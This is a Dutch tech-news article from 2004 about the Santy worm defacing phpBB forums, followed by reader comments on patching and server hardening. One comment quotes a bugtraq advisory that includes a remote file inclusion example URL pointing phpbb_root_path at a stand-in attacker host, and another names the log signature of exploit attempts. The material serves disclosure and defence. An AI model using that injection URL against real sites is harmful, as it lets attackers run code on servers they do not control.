Hoofdcategorieën
Device Settings

[RSS] [quick] Index » Nieuws » Pro » Internet » Santy bestookt phpBB-websites

Santy bestookt phpBB-websites

Door Yoeri Lauwers, woensdag 22 december 2004 11:44
Bron: Viruslist, views: 33.903

Op Viruslist.com wordt melding gemaakt van de worm Net-Worm.Perl.Santy.a die het gemunt heeft op phpBB-forums. Door gebruik te maken van een fout in de versies tot 2.0.11 van deze software, slaagt de worm erin alle asp-, php-, htm- en shtm-bestanden te overschrijven met zijn eigen code, waardoor de desbetreffende site 'defaced' wordt. Om nieuwe slachtoffers te vinden maakt deze worm gebruik van Google, wat voor deze zoekmachine de aanleiding geweest is om de queries afkomstig van deze malware te blokkeren. Het is overigens niet de eerste keer dat virussen gebruikmaken van zoekmachines om zichzelf te verspreiden.

Eerder al werden verschillende zoekdiensten belaagd door een variant van Mydoom die op zoek was naar nieuwe e-mailadressen. Nu de verspreiding van de worm tegengehouden wordt en de meeste fora een upgrade gekregen hebben is het volgens Roel Schouwenberg van Kaspersky Labs echter niet waarschijnlijk dat er een nieuwe variant van de Santy-worm zal opduiken, of dat deze indien hij toch verschijnt veel schade aan zal richten.

Defaced door Santy
Volgende 11:51 Electronic Arts koopt belang UbiSoft van Talpa
Vorige 11:00 Iomega introduceert externe schijven met FireWire 800
Advertentie

Categorieën

Gerelateerde content

Reacties

Flat modeFlat mode Sorteer aflopendSorteer aflopend Moderatie FAQModfaq
Niveaufilter: -1 Ongewenst: 93 reacties zichtbaar930 Off-topic / Irrelevant: 93 reacties zichtbaar93+1 On-topic: 76 reacties zichtbaar76+2 Informatief: 18 reacties zichtbaar18+3 Spotlight: 1 reactie zichtbaar1
«  1  2  3  4  »

Door NoepZor, woensdag 22 december 2004 11:47

Score: 0
wat krijg je dan te zien ? een andere pagina van de santi worm, of plakt het gewoon een stukje code bij in de pagina's wat niet zichtbaar is.

Vind het wel inventief, jezelf via forums verspreiden :P alleen kan erg veel overlast veroorzaken, dat is altijd het nadeel van virussen :o

Door Mayco, woensdag 22 december 2004 11:52

Score: 1
via forums verspreiden? dat staat er toch niet? het virus defaced forums, door een bug in de code... het verspreid zich wss nog gewoon via de oude traditionele manier...

Door xiphoid, donderdag 23 december 2004 04:22

Score: 1
Het verspreidt zich via Google - waar het de forums vind. En vervolgens probeert het te exploiten met een bug uit phpBB.

Veel nieuws sites melden dat dit komt door de laatste PHP vunreabilities, of dat het alle BBS software is, maar dat is onzin, het is puur die phpBB bug.

Software zoals vBulletin wat gewoon professioneler is, heeft dat soort bugs als sinds eerste versies niet meer.

Door Heineken, woensdag 22 december 2004 11:51

Score: 2
Ik heb zojuist m'n phpBB-forum al gepatched met de code van het phpBB.com forum. Op GoT loopt er ook een topic over en op isc.sans.org is ook veel informatie te vinden. In de logs hier kwam ik trouwens al een paar pogingen tegen, gelukkig blokkeert Google het nu.

Door Boozman, woensdag 22 december 2004 16:19

Score: 1
Ehhhm, AL gepatched ? Een belangrijke fout in phpbb waar al een patch voor uitkwam in november heb je nu AL gepatched ?? :Y)

Door Jan_IA, woensdag 22 december 2004 17:23

Score: 2
Zolang je site niet van levensbelang voor je is, zie ik niet in waarom je elke dag de phpBB site moet checken om te kijken of er een update is ;)

Eens per maand lijkt me dan ruim voldoende, alleen is dit wel een erg kritieke fout natuurlijk, en iets ernstiger dan het verneuken van de lay-out of iets dergelijks.

Door Blokker_1999, woensdag 22 december 2004 17:38

Score: 1
Bug is van 18/11, meer dan een maand oud dus.

Door Hodgesaargh, woensdag 22 december 2004 18:05

Score: 2
En stond dus ook ruim een maand geleden al op bugtraq.


To: bugtraq@securityfocus.com
Subject: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)

Hi all


phpBB is a very popular message board using modules extensions.


One of these module ­ Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.


Let’s start :


In file /admin/admin_cash.php


…..
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
….


First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but
$phpbb_root_path & .$phpEx ­ are *NOT* define yet!


I don’t know why, but someone decided to define these variables later in the code :


……
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


…..


Well, any user can rewrite these parameters with GET or POST requests.


Example :
http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root _path=http://bad.host/


Fix :
Set all default parameters after “if ( !empty($setmodules) )”


Example :


//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);


Thank you rofl!

Door Makkelijk, donderdag 23 december 2004 11:12

Score: 0
Waar maken jullie je toch allemaal druk om :+

Door Blokker_1999, woensdag 22 december 2004 17:23

Score: 2
Het is idd een oude bug die al lang gepatched is. Zelf hebben ze bij mij (forum.mtavc.com) ook veel schade aangericht een dag nadat de bug bekend was. Uiteraard nadien men backup terug gezet en gepatched. Op dat moment was 2.0.11 nog niet vermeld op de meuktracker en ook op andere plaatsen waar ik kom was nog geen vermelding. Pas na het kwaad geschiet was heb ik overal de melding gekregen.

Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken. De enigste mogelijkheid is dus regelmatig de phpBB site checken. En zelfs dan kan je nog te laat komen.

De bug ontstaat uit de functie urldecode die gebruikt word in de highlight functie in viewtopic.php (bij zoeken word deze gebruikt). En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip. De bug laat toe om commando's via php exec uit te voeren. Je kan dus veel verwijderen, zeker als je de directory structuur een beetje kent.

Door mosymuis, woensdag 22 december 2004 19:56

Score: 3
Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken.
Dat hebben ze wel: klik. Bovendien kan je je abonneren op de list van phpBBhacks, een zeer actieve fan community.
En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip.
Access logs, anyone? Gewoon even zoeken naar GET requests met %2527%252e in de uri.
De bug laat toe om commando's via php exec uit te voeren.
De bug laat toe om zowat elk PHP commando uit te voeren. exec en system zijn slechts voorbeelden van de ontdekster Jessica Soules (howdark.com).

Door demonite, donderdag 23 december 2004 10:46

Score: 1
dan moet je php maar in safe_mode draaien

Door Websmurf, donderdag 23 december 2004 12:07

Score: 1
@demonite

safe mode is een slechte oplossing voor dit probleem.
safe mode is zowieso een slechte manier om shared server problemen op te lossen.
The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now

Door frank2kill, woensdag 22 december 2004 11:51

Score: 0
tja altijd zorgen dat je up to date bent :) kleine moete :)

Door PatMan, woensdag 22 december 2004 12:05

Score: 1
Dat is leuk, maar de meest recente versie van phpBB is dus kwetsbaar voor deze worm. Het heeft dus niets met bijhouden te maken.

Overigens staat hier hoe je met het ouderwetse handwerk je forum kunt beschermen tegen de worm (het gaat om een urldecode weggooien).

Door pietje63, woensdag 22 december 2004 22:38

Score: 1
Met ouderwets handwerk :9.

Ik kreeg van mijn hosting provider vlak na de bug bekend was geworden een mail dat ik phpBB erop had staan en dat ik 2 weken had om de patch toe te passen of dat ze anders het bestand zelf zouden wijzigen. Best nette service vind ik, want ze moeten ook andere klanten beschermen.
offtopic:
(het forum zit trouwens achter een htaccess dus zoveel kwaad kan de worm toch niet).

Door Sfynx, donderdag 23 december 2004 00:57

Score: 1
Dat is leuk, maar de meest recente versie van phpBB is dus kwetsbaar voor deze worm. Het heeft dus niets met bijhouden te maken.
De meest recente versie van phpBB is 2.0.11, en is op 18 november speciaal uitgebracht vanwege deze vulnerability. Dus nou geen poep gaan lullen :)

Ik heb zelf een paar phpBB forums zodanig bewerkt dat ik geen zin had om te upgraden en het handwerk heb toegepast, maar als je naar 2.0.11 upgrade, is het ook goed.

Door Firefox, woensdag 22 december 2004 12:14

Score: 1
Geen geldig argument natuurlijk, maar updaten-kleine-moeite gaat dus alleen op voor een clean board.

Zelf had ik lange tijd een phpBB board wat op zijn zachtst gezegs verbouwd was. stukken modcode die de links mooi geleidelijk laten verkleuren, volledig RGB kleuren pallet, code en php highlighting zut die je syntax goed zetten etc.

Misschien dat dat er later wel in is gekomen, maar in het begin was dat niet echt aanwezig. Om dan te updaten gaf gigantisch veel mismatches. en dan is het inene HEEL veel moeite.

Door frank2kill, woensdag 22 december 2004 12:20

Score: 1
tja mijn board is ook zwaar gemod maar ik kan gewoon updaten.

als je goed leest is het forum TOT versie 2.0.11 vatbaar, dit wil zeggen 2.0.11 is totaal niet vatbaar.

deze update is ruim een maand geleden beschikbaar gekomen. en het stuk script waarmee je die exploit mee kunt voorkomen was toen al beschikbaar.

geen excuus dus.

je hebt nl ruim een maand gehad om dat script er in te zetten.en mismatches op te lossen.

Door smaij, woensdag 22 december 2004 12:00

Score: 1
Mijn server is zaterdagavond 18 december dus gedefaced. Omdat niet alle sites in php safe mode draaien waren alle sites het slachtoffer van waarschijnlijk deze bug in phpBB. Precies kunnen we het niet zeggen want schijnbaar vinden ze het ook leuk /var/log leeg te gooien.

De server draait nu gelukkig weer, maar het heeft mij wel mijn zaterdagnacht en zondag gekost en ook gister en eergisteren nog bezig geweest!

Door borft, woensdag 22 december 2004 12:08

Score: 2
hoe kan dat ding /var/log leeg gooien? /var/log is toch niet schrijfbaar voor de www user?

Door smaij, woensdag 22 december 2004 12:16

Score: 1
Dat vond ik ook wel vreemd. maar ik heb niet zoveel verstand van linux enzo, daarvoor heb ik de serverbeheerder..

Ik dacht zelf dat aangezien apache in die logs moet kunnen schrijven ze ook rechten hebben op /var/logs en apache is toch www user

Door -=bas=-, woensdag 22 december 2004 14:10

Score: 1
Bij veel servers draait Apache onder de root account dus kan je de var/log zo leeg gooien _als_ je eenmaal toegang hebt.

Door _JGC_, woensdag 22 december 2004 14:19

Score: 2
Apache onder root account? dan ben je wel een ontiegelijke nono, want dan heb je apache gecompileerd met -DBIG_SECURITY_HOLE. Apache weigert nml te draaien als root.

Nee, sommige sites vinden het handig om de logs in de dir van de gebruiker te schrijven of iets dergelijks, zodat de klant zelf bij zijn apache logs kan. Blijkbaar laten ze schrijfacties toe, wat ervoor zorgt dat de worm deze ook weg kan gooien.

Sinds maandag draaien we hier alle sites met php4-cgi en mod_fastcgi en de suexec wrapper, alle sites draaien onder het UID van de klant. Hierdoor kunnen klanten niet meer aan elkanders spullen en hebben wormen geen grote invloed op de server over het algemeen. OK, de worm heeft nu de volle rechten om de userdir leeg te gooien, maar dat had ie toch al omdat anders upload scrips niet werken :X

Door mxcreep, woensdag 22 december 2004 14:27

Score: 1
@Jan de Groot
Onder cgi of fast-cgi draaien van apache is ook niet altijd een optie ondanks dat het wel makkelijker is om het veilig te krijgen...
Je mist een aantal environment variabelen die in mod_php wel beschikbaar zijn en op een druk bezochte server ga je ook de vertraging van de cgi wrapper tov mod_php wel merken...

Door _JGC_, donderdag 23 december 2004 08:47

Score: 1
@mxcreep:
Mag jij me uitleggen welke variabelen dat zijn. In eerste instantie had ik problemen met $SERVER["SCRIPT_NAME"] die verwees naar de php binary, dit was snel opgelolst met een php.ini setting (fix path info of iets dergelijks, zie commentaar in php.ini :P). Verder kopieert PHP zelf al een heleboel variabelen uit $ENV naar $_SERVER. Ik heb tot nu toe nog geen scripts gezien die niet werken met de CGI versie.

De fastcgi methode heeft iets meer overhead dan de module versie, maar valt genoeg mee:
- request komt binnen, php wordt met suexec gestart, wat even traag is als een CGI request
- volgende requests worden gebalanceerd over 10 runnende fastcgi PHP instanties, je merkt hier niet meer dat je een CGI versie draait, het gaat even snel als de module versie.
- Na een seconde of 20 inactiviteit op de site gooit de process manager de boel weer uit, blijkbaar zijn de PHP processen niet meer nodig.

Het voordeel is dat je dat ding kunt wrappen met suexec en dat je voor statische HTML niet continu die grote PHP module met al zn brakke libs mee hoeft te zeulen, die zitten in je CGI binary, die alleen actief is als er PHP requests voor de klant zijn.

Door Schouw, woensdag 22 december 2004 12:42

Score: 0
Gedefaced dmv. deze worm of wat anders?
18 dec is namelijk erg vroeg...

Door smaij, vrijdag 24 december 2004 11:01

Score: 1
Nee was niet deze worm.
Was de simiens groep.

plaats 10 op http://www.zone-h.org/en/hallofshame

:(

Door kodak, woensdag 22 december 2004 12:11

Score: 0
Nmm is het gewoon onverantwoord om phpBB voor je site te gebruiken, tenzij deze beveiligd is met normale http gebruikers authenticatie of niet van buitenaf bereikbaar is. De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken. Toch wordt het door website beheerders zeer geregeld standaard maar toegepast voor het gemak. Op veiligheid wordt kennelijk niet meer gelet. Hopelijk zorgt deze worm voor wat meer bewustwording van de gevaren.

Door frank2kill, woensdag 22 december 2004 12:16

Score: 2
onzin kodak. als je zorgt dat je altijd up to date bent is het echt meer dan 99,9% veilig. bovendien zou je dan ook niet met linux/unix (zijn onlangs nog 40 tallen exploits in gevonden)kunnen werken. geen een stuk scriptwerk is exploit vrij zelfs (nou ja) microsoft niet.

Door kodak, woensdag 22 december 2004 21:14

Score: 1
Niks onzin. Phpbb is het meest onveilige (meest buggy en meest aangevallen) webonderhoud tool van de afgelopen jaren. Het is de harde realiteit dat veel gebruikers phpbb als makkelijke oplossing zien om iemand zn site te laten beheren en er na implementatie niet meer omkijkt naar het updaten. Zelfs als er al aan wordt gedacht om te updaten wordt dat vaak nog te laat gedaan ook. Kortom, je bent dus wel degelijk veiliger af als je het niet open en bloot op het internet gebruikt.

Door mosymuis, woensdag 22 december 2004 16:39

Score: 2
Je denkwijze is begrijpelijk, maar je beredenatie zeer zeker niet.
De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken.
Hoewel ik toe moet geven dat sommige lekken, vooral de XSS holes van voor < 2.0.10, dom en onnodig waren, is het onzin dat phpBB onveilig is vanwege zijn vele updates het afgelopen jaar. Als je ook maar een flauw benul had hoeveel forums wereldwijd dit systeem gebruiken, begrijp je de motivatie achter securitygroepen om het beestje te kunnen kraken. Andere open source forum systemen ljken nu veiliger omdat ze minder aandacht krijgen van deze mensen. In mijn ogen is dat alleen maar schadelijker, want feitelijk betekent dat dat de veiligheidslekken dan blijven bestaan. Geen enkel dynamisch script met de omvang van phpBB is 100% veilig, het is en blijft een voortdurend proces.
Op veiligheid wordt kennelijk niet meer gelet.
Hoe verklaar je dan de snelle response waarmee phpBB uren nadat kritische lekken gemeld worden, patches released? Doet de uitmuntende support op de internationale en nationale phpBB forums je niets? Of hamert phpBB naar jouw mening niet genoeg op de risico's van niet upgraden? Vier officiële info threads op de frontpage over één exploit lijken mij ruim voldoende namelijk.

Door kodak, woensdag 22 december 2004 22:14

Score: 1
Ik vind mijn redenatie absoluut niet ongegrond. Ik heb het hier niet over onveiliger, maar gewoon dat het door de omstandigheden niet veilig is.
Het is natuurlijk niet vreemd dat een van de meest gebruikte webtools ook het meest aangevallen wordt, maar dat creeert op dit moment wel al een behoorlijke tijd dat het dus ook niet veilig genoeg is. Ziet vandaag een van de voorbeelden voor wie zn tool niet tijdig heeft geupdate.
Wat betreft die snelle responce: die zijn helaas oorzaak van onopgemerkte securitybugs die in definitieve releases zitten. Kijk eens even bij packetstormsecurity.nl oid en tel het aantal exploits die snel achter elkaar gevonden worden. Ja, een tool dat veel wordt gebruikt maakt grote kans om aangevallen te worden op zoek naar bugs, maar ze zitten er dus zeer vaak ook gewoon nog in ook. Als ik zou moeten kiezen bij een makkelijke tool dat een behoorlijk risico met zich mee brengt hoe dat beveilgd moet worden dan is die keus niet moeilijk gemaakt. Maar kennelijk denken daar veel mensen anders over, en ziet hier het resultaat van dat negerende gedrag.

Door Sfynx, donderdag 23 december 2004 01:14

Score: 1
En als jouw favoriete forum nou door iedereen gebruikt en aangevallen wordt, en niemand update tijdig bij het uitkomen van een vulnerability, is dat forum dan toch beter? Dezelfde omstandigheden dan IMO. Dus geen reden om phpBB te gaan bashen.

Door Schmiel, woensdag 22 december 2004 12:16

Score: 2
Deze lek is al langer dan een maand geleden beschreven door de makers van phpBB. als je secuur genoeg bent met alle scripts die je draait, dan had je het forum allang geupdate. Desalnietemin erg vervelend voor de gedupeerden. Dit is misschien een wakkermakertje voor de minder oplettende systeembeheerder/websiteontwikkelaar.

Door mariusjr, woensdag 22 december 2004 13:03

Score: 2
Vergeet niet dat veel onderdelen die op een forum draaien vaak niet werken op een nieuwe versie. Het is dan best wel veel werk om alles weer aan te passen dan...

Door frank2kill, woensdag 22 december 2004 13:27

Score: 0
waar je meer als een maand de tijd voro hebt gehad, oftewel geen excuus.

Door Heephstan, woensdag 22 december 2004 15:32

Score: 1
ja daar kom ik inderdaad ook elke week, want ik heb mijn forumpje voor de gein voor een paar vriend gehost en bezoek dus elke week voor hun en mijn veiligheid dat forum

Door Bierkameel, woensdag 22 december 2004 12:28

Score: 0
We hebben het gezien ja, leuk zo'n virus

Ow onze site doet het alweer :P

Door TimDJ, woensdag 22 december 2004 12:30

Score: 2
Ik ging eens kijken op google en verbaas me echt over de hoeveelheid sites die hiermee te maken hebben (gehad)
zie:
http://www.google.nl/search?hl=nl&q=%22this+site+is+defaced%21%21%21%2 2&lr=

Door number3, woensdag 22 december 2004 12:45

Score: 2
Zo'n 1500 sites ongeveer. Je kunt zelfs zien dat er tenmisnte 24 generaties van de worm actief zijn geweest. Ik neem aan dat de maker van deze worm gelijk zo veel mogelijk achterdeurtjes geïnstalleerd heeft, want anders heeft zo'n vernietigende aanval helemaal geen zin.

Door jp, woensdag 22 december 2004 17:48

Score: 1
Waarom?
Als je defaced bent zet je toch je backup terug, en patched het geheel?
«  1  2  3  4  »

Op dit item kan niet meer gereageerd worden.

Volgende 11:51 Electronic Arts koopt belang UbiSoft van Talpa
Vorige 11:00 Iomega introduceert externe schijven met FireWire 800
VNU Media logo Hosted by True

© 1998 - 2012 Tweakers.net B.V. - Alle rechten voorbehouden - Contact - Jouw privacy - Algemene Voorwaarden

Uitgever van:

Website van het jaar 2011